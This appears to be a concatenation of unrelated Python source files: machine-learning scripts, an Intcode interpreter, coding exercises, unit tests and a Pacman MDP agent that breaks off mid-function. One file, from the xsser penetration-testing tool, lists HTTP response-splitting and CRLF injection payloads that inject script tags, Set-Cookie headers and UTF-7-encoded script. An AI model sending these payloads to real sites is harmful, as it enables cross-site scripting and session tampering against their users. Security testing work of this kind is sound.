y = tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2, name='y')
return y
def main():
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
# Input layer
x = tf.placeholder(tf.float32, [None, 784], name='x')
y_ = tf.placeholder(tf.float32, [None, 10], name='y_')
keep_prob = tf.placeholder(tf.float32)
x_image = tf.reshape(x, [-1, 28, 28, 1])
y = models_mnist.cnn_classifier_2(x=x_image, name='classifier',keep_prob=keep_prob, reuse=False)#create model
# Evaluation functions
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name='accuracy')
# Training algorithm
c_var = tf.trainable_variables('classifier')
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy, var_list=c_var)
# Saver
c_saver = tf.train.Saver(var_list=c_var)
saver = tf.train.Saver()
# Training steps
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
# c_saver.restore(sess, "results/cnn_classifier/checkpoint/model.ckpt")
max_steps = 120
for step in range(max_steps):
batch_xs, batch_ys = mnist.train.next_batch(50) # 0 ~ 1
# batch_xs = batch_xs*2-1 # -1 ~ 1, bad results
if (step % 10) == 0:
print(step, sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys, keep_prob: 0.5})
print(max_steps, sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
save_path = saver.save(sess, "results/cnn_classifier-med-train/checkpoint/model.ckpt")
# print('Test Acc', sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
print("Model saved in path: %s" % save_path)
print(" [*] Close main session!")
sess.close()
main()
# import utils
# import traceback
# import numpy as np
# import tensorflow as tf
# import models_mnist as models
# import datetime
# import my_utils
# # from classifier import cnn_classifier
#
#
# """ param """
# epoch = 200
# batch_size = 128
# batch_size2 = 64
# lr = 0.0002
# z_dim = 100
# beta = 1 #diversity hyper param
# # clip = 0.01
# n_critic = 1 #
# n_generator = 1
# gan_type="experiment"
# dir="results/"+gan_type+"-"+datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
#
# np.random.seed(0)
# tf.set_random_seed(1234)
#
# # restore = False
# # ckpt_dir =
#
# ''' data '''
# data_pool = my_utils.getMNISTDatapool(batch_size, keep=[0, 1,8])
#
# """ graphs """
# generator = models.ss_generator_2
# discriminator = models.ss_discriminator
# optimizer = tf.train.AdamOptimizer
#
#
# # inputs
# real = tf.placeholder(tf.float32, shape=[None, 28, 28, 1])
# z = tf.placeholder(tf.float32, shape=[None, z_dim])
#
#
# # generator
# fake = generator(z, reuse=False, name="g1")
# fake2 = generator(z, reuse=False, name="g2")
#
# # discriminator
# r_logit = discriminator(real, reuse=False, name="d1")
# f1_logit = discriminator(fake, name="d1")
# f2_logit = discriminator(fake2, name="d1")
#
# #supplement discriminator
# f1_c = cnn_classifier(x_image=fake,keep_prob=1., reuse=False)#create model
# f2_c = cnn_classifier(x_image=fake2, keep_prob=1.)#create model
# # f1_c = discriminator(fake, reuse=False, name="d2")
# # f2_c = discriminator(fake2, name="d2")
#
# #discriminator loss
# D_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=r_logit, labels=tf.ones_like(r_logit)))
# D_loss_fake1 = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=f1_logit, labels=tf.zeros_like(f1_logit)))
# D_loss_fake2 = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=f2_logit, labels=tf.zeros_like(f2_logit)))
# d_loss = D_loss_real + D_loss_fake1 + D_loss_fake2
# # d_loss = D_loss_real + D_loss_fake1
#
# #supplement discriminator loss
# onehot_labels_zero = tf.one_hot(indices=tf.zeros(batch_size, tf.int32), depth=10)
# onehot_labels_one = tf.one_hot(indices=tf.ones(batch_size, tf.int32), depth=10)
# D2_loss_f1 = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=f1_c, labels=onehot_labels_zero))
# D2_loss_f2 = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=f2_c, labels=onehot_labels_one))
# # d2_loss = D2_loss_f1 + D2_loss_f2
#
# #generator loss
# g1_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=f1_logit, labels=tf.ones_like(f1_logit)))
# g2_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=f2_logit, labels=tf.ones_like(f2_logit)))
# g1_loss += beta*D2_loss_f1
# g2_loss += beta*D2_loss_f2
# g_loss = g1_loss + g2_loss
#
# # trainable variables for each network
# T_vars = tf.trainable_variables()
# # G_vars = tf.global_variables()
# d_var = [var for var in T_vars if var.name.startswith('d1')]
# g1_var = [var for var in T_vars if var.name.startswith('g1')]
# g2_var = [var for var in T_vars if var.name.startswith('g2')]
# c_var = [var for var in T_vars if var.name.startswith('classifier')]
#
# # optims
# global_step = tf.Variable(0, name='global_step',trainable=False)
# d_step = optimizer(learning_rate=lr, beta1=0.5).minimize(d_loss, var_list=d_var, global_step=global_step)
# # d2_step = optimizer(learning_rate=lr, beta1=0.5).minimize(d2_loss, var_list=d2_var)
# # g_step = optimizer(learning_rate=lr).minimize(g1_loss, var_list=g1_var)
# # g2_step = optimizer(learning_rate=lr).minimize(g2_loss, var_list=g2_var)
# G_step = optimizer(learning_rate=lr, beta1=0.5).minimize(g_loss, var_list=g1_var + g2_var)
# """ train """
# ''' init '''
# # session
# sess = tf.InteractiveSession()
#
# # saver
# saver = tf.train.Saver(max_to_keep=5)
# c_saver = tf.train.Saver(var_list=c_var)
# # summary writer
# # Send summary statistics to TensorBoard
# tf.summary.scalar('G1_loss', g1_loss)
# tf.summary.scalar('G2_loss', g2_loss)
# tf.summary.scalar('G_loss', g_loss)
# tf.summary.scalar('Discriminator_loss', d_loss)
# # tf.summary.scalar('Supplement_Discriminator_loss', d2_loss)
# images_form_g1 = generator(z, name="g1", training= False)
# images_form_g2 = generator(z, name="g2", training= False)
# tf.summary.image('G1_images', images_form_g1, 12)
# tf.summary.image('G2_images', images_form_g2, 12)
# merged = tf.summary.merge_all()
# logdir = dir+"/tensorboard"
# writer = tf.summary.FileWriter(logdir, sess.graph)
# print('Tensorboard dir: '+logdir)
#
# ''' initialization '''
# # ckpt_dir = './checkpoints/mnist_wgan'
# # utils.mkdir(ckpt_dir + '/')
# # if not utils.load_checkpoint(ckpt_dir, sess):
# sess.run(tf.global_variables_initializer())
# c_saver.restore(sess, "results/cnn_classifier/checkpoint/model.ckpt")
#
# ''' train '''
# batch_epoch = len(data_pool) // (batch_size * n_critic)
# max_it = epoch * batch_epoch
# def training(max_it, it_offset):
# print("Max iteration: " + str(max_it))
# total_it = it_offset + max_it
# for it in range(it_offset, it_offset + max_it):
#
# for i in range(n_critic):
# real_ipt = (data_pool.batch('img')+1.)/2.
# z_ipt = np.random.normal(size=[batch_size2, z_dim])
# _, _ = sess.run([d_step], feed_dict={real: real_ipt, z: z_ipt})
# # _ = sess.run([d_step], feed_dict={real: real_ipt, z: z_ipt})
#
# # train G
# for j in range(n_generator):
# z_ipt = np.random.normal(size=[batch_size2, z_dim])
# # _, _ = sess.run([g_step,g2_step], feed_dict={z: z_ipt})
# _ = sess.run([G_step], feed_dict={z: z_ipt})
#
# if it%10 == 0 :
# real_ipt = (data_pool.batch('img')+1.)/2.
# z_ipt = np.random.normal(size=[batch_size2, z_dim])
# summary = sess.run(merged, feed_dict={real: real_ipt,z: z_ipt})
# writer.add_summary(summary, it)
#
# var = raw_input("Continue training for %d iterations?" % max_it)
# if var.lower() == 'y':
# training(max_it, it_offset + max_it)
#
# total_it = 0
# try:
# training(max_it,0)
# total_it = sess.run(global_step)
# print("Total iterations: "+str(total_it))
# except Exception, e:
# traceback.print_exc()
# finally:
# var = raw_input("Save sample images?")
# if var.lower() == 'y':
# list_of_generators = [images_form_g1, images_form_g2] # used for sampling images
# list_of_names = ['g1-it%d.jpg'%total_it,'g2-it%d.jpg'%total_it]
# rows = 10
# columns = 10
# sample_imgs = sess.run(list_of_generators, feed_dict={z: np.random.normal(size=[rows*columns, z_dim])})
# save_dir = dir + "/sample_imgs"
# utils.mkdir(save_dir + '/')
# for imgs,name in zip(sample_imgs,list_of_names):
# my_utils.saveSampleImgs(imgs=imgs, full_path=save_dir+"/"+name, row=rows,column=columns)
# # save checkpoint
# save_path = saver.save(sess, dir+"/checkpoint/model.ckpt")
# print("Model saved in path: %s" % save_path)
# print(" [*] Close main session!")
# sess.close()
|
10,545 | 80fee63893a9011e80471fe168327e30cd6a80a1 |
#calss header
class _MARSHALS():
def __init__(self,):
self.name = "MARSHALS"
self.definitions = marshal
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['marshal']
|
10,546 | 1cc2f4b3dbbd33ed350a6cc3c8685fb0607d9e4b | class Intcode:
def __init__(self, program, input, output):
self.memory = {i: program[i] for i in range(len(program))}
self.input = input
self.output = output
self.ip = 0
self.base = 0
def get_value_at(self, address):
return self.memory.get(address, 0)
def get_value(self, mode, offset):
address = self.ip + offset
if mode == 0:
return self.get_value_at(self.get_value_at(address))
if mode == 2:
return self.get_value_at(self.base + self.get_value_at(address))
return self.get_value_at(address)
def set_value(self, mode, offset, value):
address = self.get_value_at(self.ip + offset)
if mode == 2:
address = self.base + address
self.memory[address] = value
def run(self):
while True:
opcode = self.get_value_at(self.ip) % 100
modes = self.get_value_at(self.ip) // 100
m1 = modes % 10
modes = modes // 10
m2 = modes % 10
modes = modes // 10
m3 = modes % 10
if opcode == 1:
value = self.get_value(m1, 1) + self.get_value(m2, 2)
self.set_value(m3, 3, value)
self.ip += 4
elif opcode == 2:
value = self.get_value(m1, 1) * self.get_value(m2, 2)
self.set_value(m3, 3, value)
self.ip += 4
elif opcode == 3:
if len(self.input) == 0:
return False
self.set_value(m1, 1, self.input.pop(0))
self.ip += 2
elif opcode == 4:
self.output.append(self.get_value(m1, 1))
self.ip += 2
elif opcode == 5:
if self.get_value(m1, 1) != 0:
self.ip = self.get_value(m2, 2)
else:
self.ip += 3
elif opcode == 6:
if self.get_value(m1, 1) == 0:
self.ip = self.get_value(m2, 2)
else:
self.ip += 3
elif opcode == 7:
if self.get_value(m1, 1) < self.get_value(m2, 2):
self.set_value(m3, 3, 1)
else:
self.set_value(m3, 3, 0)
self.ip += 4
elif opcode == 8:
if self.get_value(m1, 1) == self.get_value(m2, 2):
self.set_value(m3, 3, 1)
else:
self.set_value(m3, 3, 0)
self.ip += 4
elif opcode == 9:
self.base += self.get_value(m1, 1)
self.ip += 2
elif opcode == 99:
return True
|
10,547 | 7468f96da6b94a039e2ce67020b970e7f1ce12ae | """
$Id$
This file is part of the xsser project, http://xsser.sourceforge.net.
Copyright (c) 2011/2012/2013/2014/2015 - <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 3 of the License.
xsser is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along
with xsser; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
## This file contains different XSS fuzzing vectors to inject in payloads and browser supports.
## If you have some new vectors, please email me to [epsylon@riseup.net] and will be added to XSSer framework.
## Thats all.
###
## Happy Cross Hacking! ;)
HTTPrs_vectors = [
{ 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A<html>XSS</html>
""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """XSS%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("XSS")</script>""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0D%0ASet-Cookie%3AXSS""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22XSS%22)%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1""",
'browser' : """[Induced Injection]"""},
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
""",
'browser' : """[Induced Injection]"""},
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('%58%53%53');%2BADw-/script%2BAD4-
""",
'browser' : """[Induced Injection]""" }
]
|
10,548 | e99b1ae97b9834288b6606fa874e45850187c9e4 | """
Given the root of a binary tree and an integer distance. A pair of two different leaf nodes of a binary tree is said to be good if the length of the shortest path between them is less than or equal to distance.
Return the number of good leaf node pairs in the tree.
Example 1:
Input: root = [1,2,3,null,4], distance = 3
Output: 1
Explanation: The leaf nodes of the tree are 3 and 4 and the length of the shortest path between them is 3. This is the only good pair.
Example 2:
Input: root = [1,2,3,4,5,6,7], distance = 3
Output: 2
Explanation: The good pairs are [4,5] and [6,7] with shortest path = 2. The pair [4,6] is not good because the length of ther shortest path between them is 4.
Example 3:
Input: root = [7,1,4,6,null,5,3,null,null,null,null,null,2], distance = 3
Output: 1
Explanation: The only good pair is [2,5].
Example 4:
Input: root = [100], distance = 1
Output: 0
Example 5:
Input: root = [1,1,1], distance = 2
Output: 1
Constraints:
The number of nodes in the tree is in the range [1, 2^10].
Each node's value is between [1, 100].
1 <= distance <= 10
"""
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def countPairs(self, root: TreeNode, distance: int) -> int:
res = [0]
self.dfs(root, distance, res)
return res[0]
def dfs(self, root: TreeNode, distance: int, res: List[int]) -> None:
if not root:
return []
if not root.left and not root.right:
return [1]
left = self.dfs(root.left, distance, res)
right = self.dfs(root.right, distance, res)
res[0] += sum(l + r <= distance for l in left for r in right)
return [n+1 for n in left + right if n+1 < distance]
|
10,549 | 2c5d3af8d6de9ba93a304cc826972c24079237e8 | aluno0 = {'Nome': str(input('Digite o nome do aluno: ')).strip().capitalize()}
nota1 = float(input(f'Digite a nota do {aluno0["Nome"]} no 1° bimestre: '))
nota2 = float(input(f'Digite a nota do {aluno0["Nome"]} no 2° bimestre: '))
aluno0['Media'] = (nota1 + nota2) / 2
if aluno0['Media'] < 5:
aluno0['Situação'] = 'Reprovado'
elif 5 <= aluno0['Media'] < 6:
aluno0['Situação'] = 'Recuperação'
else:
aluno0['Situação'] = 'Aprovado'
for k, v in aluno0.items():
print(f'{k}: {v}')
# Jeito do professor é praticamente a mesma coisa
# Desafio 090 -> C. um programa que leia nome e média de um aluno,
# guardando também a situação (reprovado ou aprovado) em um dicionário.
# No final mostre o conteúdo da estrutura na tela
# Nome: input
# Média de (Nome): input (vamos fazer com 6)
# output:
# Nome:
# Média:
# Situação: reprovado (ou) aprovado |
10,550 | defc2067dc521b3d7e9c75d74855a72379679759 | import unittest
from parameterized import parameterized
import numpy as np
from src.dataset.preprocessing.images import _GroundTruthClassMapper
from src.dataset.utils.mapping_utils import Color2IdMapping
from test.utils import ArrayContentSpec, assembly_array
class GroundTruthClassMapper(unittest.TestCase):
@parameterized.expand([
[
{
(0, 0, 0): 0,
(1, 0, 0): 1,
(0, 1, 0): 2,
(0, 0, 1): 3
},
(
10, 10, 3,
[],
np.uint8
),
(
10, 10, 1,
[],
np.uint8
)
],
[
{
(0, 0, 0): 0,
(1, 0, 0): 101,
(0, 1, 0): 2,
(0, 0, 1): 3
},
(
10, 10, 3,
[((0, 0), (5, 5), 0, 1)],
np.uint8
),
(
10, 10, 1,
[((0, 0), (5, 5), 0, 101)],
np.uint8
)
],
[
{
(0, 0, 0): 0,
(1, 0, 0): 101,
(0, 1, 0): 2,
(0, 0, 1): 3
},
(
10, 10, 3,
[
((0, 0), (5, 5), 0, 1),
((9, 9), (10, 10), 2, 1),
],
np.uint8
),
(
10, 10, 1,
[
((0, 0), (5, 5), 0, 101),
((9, 9), (10, 10), 0, 3),
],
np.uint8
)
]
])
def test_mapping(self,
color2id: Color2IdMapping,
input_image_spec: ArrayContentSpec,
expected_output_spec: ArrayContentSpec
) -> None:
# given
mapper = _GroundTruthClassMapper(
color2id=color2id
)
input_image = assembly_array(*input_image_spec)
expected_output = np.squeeze(assembly_array(*expected_output_spec))
# when
result = mapper.map_classes_id(input_image)
# then
self.assertTrue(np.array_equal(result, expected_output))
|
10,551 | cf2e2a1835bb07650b6c66285b78b116cf522690 | import pytest
import random
from merge_sort import merge_sort
def test_func_exists():
merge_sort([1])
def test_sort():
input = [1, 5, 3, 2, 4]
actual = merge_sort(input)
expected = [1, 2, 3, 4, 5]
assert actual == expected
def test_all_same():
input = [3, 3, 3, 3, 3, 3, 3]
actual = merge_sort(input)
expected = [3, 3, 3, 3, 3, 3, 3]
assert actual == expected
def test_sort_zero():
with pytest.raises(Exception):
merge_sort([])
def test_sort_lots():
input = []
for x in range(1000):
input.append(random.randint(1, 1000))
actual = merge_sort(input)
expected = input
expected.sort()
assert actual == expected
|
10,552 | 862ab0a9be465ce16b3d273a5eb8de3a94a80452 | # mdpAgents.py
# parsons/20-nov-2017
#
# Version 1
#
# The starting point for CW2.
#
# Intended to work with the PacMan AI projects from:
#
# http://ai.berkeley.edu/
#
# These use a simple API that allow us to control Pacman's interaction with
# the environment adding a layer on top of the AI Berkeley code.
#
# As required by the licensing agreement for the PacMan AI we have:
#
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
# The agent here is was written by Simon Parsons, based on the code in
# pacmanAgents.py
from pacman import Directions
from game import Agent
import api
# Taken from mapAgents.py lab solutions on keats
# Draws up a grid for the map
class Grid:
def __init__(self, width, height):
subgrid = []
self.width = width
self.height = height
for m in range(self.height):
row = []
for n in range(self.width):
row.append(0)
subgrid.append(row)
self.grid = subgrid
# Sets value of (m,n)
def setVal(self, m, n, value):
self.grid[n][m] = value
# Returns value of (m,n)
def getVal(self, m, n):
return self.grid[n][m]
def getHeight(self):
return self.height
def getWidth(self):
return self.width
# Prints the grid
def display(self):
for m in range(self.height):
for n in range(self.width):
print self.grid[self.height - m - 1][n],
print
print
# Finds the best move for pacman at each of pacman's states by calculating their utilities
class MDPAgent(Agent):
# Constructor: this gets run when we first invoke pacman.py
def __init__(self):
print("Starting up MDPAgent!")
self.VisitedCoords = [] # stores a list of visited spaces on the map
self.MapOfFood = [] # stores a list of food coordinates
self.MapOfCaps = [] # stores a list of capsules' coordinates
self.MapOfWalls = [] # stores a list of wall coordinates
# Gets run after MDPAgent object is created and once there is game state to access
def registerInitialState(self, state):
print("Running registerInitialState for MDPAgent!")
print("I'm at:")
print(api.whereAmI(state))
#Taken from mapAgents lab solutions on keats, makes the map
self.makeMap(state)
self.addWalls(state)
self.map.display()
# This is what gets run between multiple games
def final(self, state):
print("Looks like the game just ended!")
# When the game ends the arrays should be emptied so the next game can start fresh
self.VisitedCoords = []
self.MapOfFood = []
self.MapOfCaps = []
self.MapOfWalls = []
# Make a map by creating a grid of the right size
# Taken from mapAgents lab solutions on keats
def makeMap(self, state):
corners = api.corners(state)
height = self.heightOfLayout(corners)
width = self.widthOfLayout(corners)
self.map = Grid(width, height)
# Function will give the height of the layout
def heightOfLayout(self, corners):
array= []
for m in range(len(corners)):
array.append(corners[m][1])
return max(array) + 1 # the +1 is because the indexes of the array start at 0
# Function will give the width of the layout
def widthOfLayout(self, corners):
array = []
for m in range(len(corners)):
array.append(corners[m][0])
return max(array) + 1 # the +1 is because the indexes of the array start at 0
# Adds and shows walls on map grid as the character 'W'
def addWalls(self, state):
walls = api.walls(state)
for m in range(len(walls)):
self.map.setVal(walls[m][0], walls[m][1], "W")
def makeMapWithValues(self, state):
# This will return all coordinates on the map along with the values they have
# food and capsules get the value of 10 and empty coordinates get the value 0
pacLoc = api.whereAmI(state) # Location of pacman
food = api.food(state) # Location of food
caps = api.capsules(state) # Location of capsules
corners = api.corners(state) # Location of corners
walls = api.walls(state) # Location of walls
ghosts = api.ghosts(state) # Location of ghosts
# if pacman's current location hasn't be visited before, add to list of previously visited locations
if pacLoc not in self.VisitedCoords:
self.VisitedCoords.append(pacLoc)
# adds food to the food map, if not already there
for m in food:
if m not in self.MapOfFood:
self.MapOfFood.append(m)
# adds capsules to the capsules map, if not already there
for m in caps:
if m not in self.MapOfCaps:
self.MapOfCaps.append(m)
# adds walls to the wall map, if not already there
for m in walls:
if m not in self.MapOfWalls:
self.MapOfWalls.append(m)
# Dictionaries will store all the coordinates of food/capsules/walls and assign the corresponding values to them
# Map will then be initialised with these values
mapWithValues = {}
mapWithValues.update(dict.fromkeys(self.MapOfFood, 100))
mapWithValues.update(dict.fromkeys(self.MapOfCaps, 100))
mapWithValues.update(dict.fromkeys(self.MapOfWalls, 'W'))
# This will give pacman's initial coord the value 0
for m in range(self.widthOfLayout(corners) - 1):
for n in range(self.heightOfLayout(corners) - 1):
if (m, n) not in mapWithValues.keys():
mapWithValues[(m, n)] = 0
# if pacman has visited a coordinate and it no longer has food/capsules, its value is set to 0
for m in self.MapOfFood:
if m in self.VisitedCoords:
mapWithValues[m] = 0
for m in self.MapOfCaps:
if m in self.VisitedCoords:
mapWithValues[m] = 0
# if a coord on the map contains a ghost, its value is changed to -100
for m in mapWithValues.keys():
for n in range(len(ghosts)):
if ((int(ghosts[n][0])), (int(ghosts[n][1]))) == m:
mapWithValues[m] = -100 # Negative value for coordinates containing ghosts
return mapWithValues
# following function will calculate, and assign as values, the meu of the coords on the map
# used as transition model value in value iteration
def transition(self, m, n, mapWithValues):
# Contains values of every coord
self.mapWithValues = mapWithValues
# Dictionary will store the utilities
self.utilityDictionary = {"NorthUtility": 0.0, "EastUtility": 0.0, "SouthUtility": 0.0, "WestUtility": 0.0}
# Directions with respect to pacman's location
self.m = m
self.n = n
CurrentLocation = (self.m, self.n)
North = (self.m, self.n + 1)
East = (self.m + 1, self.n)
South = (self.m, self.n - 1)
West = (self.m - 1, self.n)
# If north of pacman is a wall, the value of pacman's current coord is multiplied by the expected utility
# If it is not a wall, the value of the coord is multiplied by the expected utility
# Same is done for east and west of pacman as there is a 10% chance (each) pacman will move in those directions
if self.mapWithValues[North] == "W":
NorthUtility = self.mapWithValues[CurrentLocation] * 0.8
else:
NorthUtility = self.mapWithValues[North] * 0.8
if self.mapWithValues[East] == "W":
NorthUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
NorthUtility += self.mapWithValues[East] * 0.1
if self.mapWithValues[West] == "W":
NorthUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
NorthUtility += self.mapWithValues[West] * 0.1
# If east of pacman is a wall, the value of pacman's current coord is multiplied by the expected utility
# If it is not a wall, the value of the coord is multiplied by the expected utility
# Same is done for north and south of pacman as there is a 10% chance (each) pacman will move in those directions
if self.mapWithValues[East] == "W":
EastUtility = self.mapWithValues[CurrentLocation] * 0.8
else:
EastUtility = self.mapWithValues[East] * 0.8
if self.mapWithValues[North] == "W":
EastUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
EastUtility += self.mapWithValues[North] * 0.1
if self.mapWithValues[South] == "W":
EastUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
EastUtility += self.mapWithValues[South] * 0.1
# If south of pacman is a wall, the value of pacman's current coord is multiplied by the expected utility
# If it is not a wall, the value of the coord is multiplied by the expected utility
# Same is done for east and west of pacman as there is a 10% chance (each) pacman will move in those directions
if self.mapWithValues[South] == "W":
SouthUtility = self.mapWithValues[CurrentLocation] * 0.8
else:
SouthUtility = self.mapWithValues[South] * 0.8
if self.mapWithValues[East] == "W":
SouthUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
SouthUtility += self.mapWithValues[East] * 0.1
if self.mapWithValues[West] == "W":
SouthUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
SouthUtility += self.mapWithValues[West] * 0.1
# If west of pacman is a wall, the value of pacman's current coord is multiplied by the expected utility
# If it is not a wall, the value of the coord is multiplied by the expected utility
# Same is done for north and south of pacman as there is a 10% chance (each) pacman will move in those directions
if self.mapWithValues[West] == "W":
WestUtility = self.mapWithValues[CurrentLocation] * 0.8
else:
WestUtility = self.mapWithValues[West] * 0.8
if self.mapWithValues[North] == "W":
WestUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
WestUtility += self.mapWithValues[North] * 0.1
if self.mapWithValues[South] == "W":
WestUtility += self.mapWithValues[CurrentLocation] * 0.1
else:
WestUtility += self.mapWithValues[South] * 0.1
# Assign the new utilities for each direction
self.utilityDictionary["NorthUtility"] = NorthUtility
self.utilityDictionary["EastUtility"] = EastUtility
self.utilityDictionary["SouthUtility"] = SouthUtility
self.utilityDictionary["WestUtility"] = WestUtility
# find the largest utility value in the dictionary and set it as
self.mapWithValues[CurrentLocation] = max(self.utilityDictionary.values())
# Return the map (which has now got the transition values)
return self.mapWithValues[CurrentLocation]
# Function will do value iteration for the small map using the Bellman equation
def valueIterationForSmallGrid(self, state, reward, discountFunction, mapWithValues):
food = api.food(state) # Location of food
caps = api.capsules(state) # Location of capsules
corners = api.corners(state) # Location of corners
walls = api.walls(state) # Location of walls
ghosts = api.ghosts(state) # Location of ghosts
Width = self.widthOfLayout(corners) - 1 # Width of the layout
Height = self.heightOfLayout(corners) - 1 # Height of the layout
# Bellman equation implementation
iterations = 100
while 0 < iterations :
for m in range(Width):
for n in range(Height):
if (m, n) not in food and (m, n) not in caps and (m, n) not in walls and (m, n) not in ghosts:
mapOrig = mapWithValues.copy() # Stores all previous values
mapWithValues[(m, n)] = reward + discountFunction * self.transition(m, n, mapOrig) # Bellman equation
iterations -= 1 # decrement the iteration variable so the while loop repeats 100 times
# Function will do value iteration for the medium classic map using the Bellman equation
def valueIterationForMediumClassic(self, state, reward, discountFunction, mapWithValues):
food = api.food(state) # Location of food
caps = api.capsules(state) # Location of capsules
corners = api.corners(state) # Location of corners
walls = api.walls(state) # Location of walls
ghosts = api.ghosts(state) # Location of ghosts
Width = self.widthOfLayout(corners) - 1 # Width of the layout
Height = self.heightOfLayout(corners) - 1 # Height of the layout
# Following code performs value iteration on coords 5 or less away from ghosts in any direction
# Makes sure that pacman doesn't avoid food just because it's near a ghost
foodUtilities = []
for m in range(0, 5):
for n in range(len(ghosts)):
if (int(ghosts[n][0]), int(ghosts[n][1] + 1)) not in foodUtilities: # 5 or less North of the ghost
foodUtilities.append((int(ghosts[n][0]), int(ghosts[n][1] + m)))
if (int(ghosts[n][0] + 1), int(ghosts[n][1])) not in foodUtilities: # 5 or less East of the ghost
foodUtilities.append((int(ghosts[n][0] + m), int(ghosts[n][1])))
if (int(ghosts[n][0]), int(ghosts[n][1] - 1)) not in foodUtilities: # 5 or less South of the ghost
foodUtilities.append((int(ghosts[n][0]), int(ghosts[n][1] - m)))
if (int(ghosts[n][0] - 1), int(ghosts[n][1])) not in foodUtilities: # 5 or less West of the ghost
foodUtilities.append((int(ghosts[n][0] - m), int(ghosts[n][1])))
# When food is not eaten and is more than 5 spaces away from a ghost it does not need to be calculated
# The following array will store these coords
XCalc = []
for m in food:
if m not in foodUtilities:
XCalc.append(m)
# Bellman equation implementation
iterations = 100 # only 100 iterations so time isn't wasted by computing more iterations than necessary
while 0 < iterations:
for m in range(Width):
for n in range(Height):
if (m, n) not in ghosts and (m, n) not in caps and (m, n) not in walls and (m, n) not in XCalc:
mapOrig = mapWithValues.copy() # store all the previous values
# Bellman equation (Rounded so the valued map is easier to see)
mapWithValues[(m, n)] = int(reward + (discountFunction * self.transition(m, n, mapOrig)))
iterations -= 1 # decrement the iteration variable so the while loop repeats 100 times
def policy(self, state, iterationMap):
pac = api.whereAmI(state) # Location of pacman
# Map that has been through a value iteration function
self.mapWithValues = iterationMap
# Dictionary will store the utility values
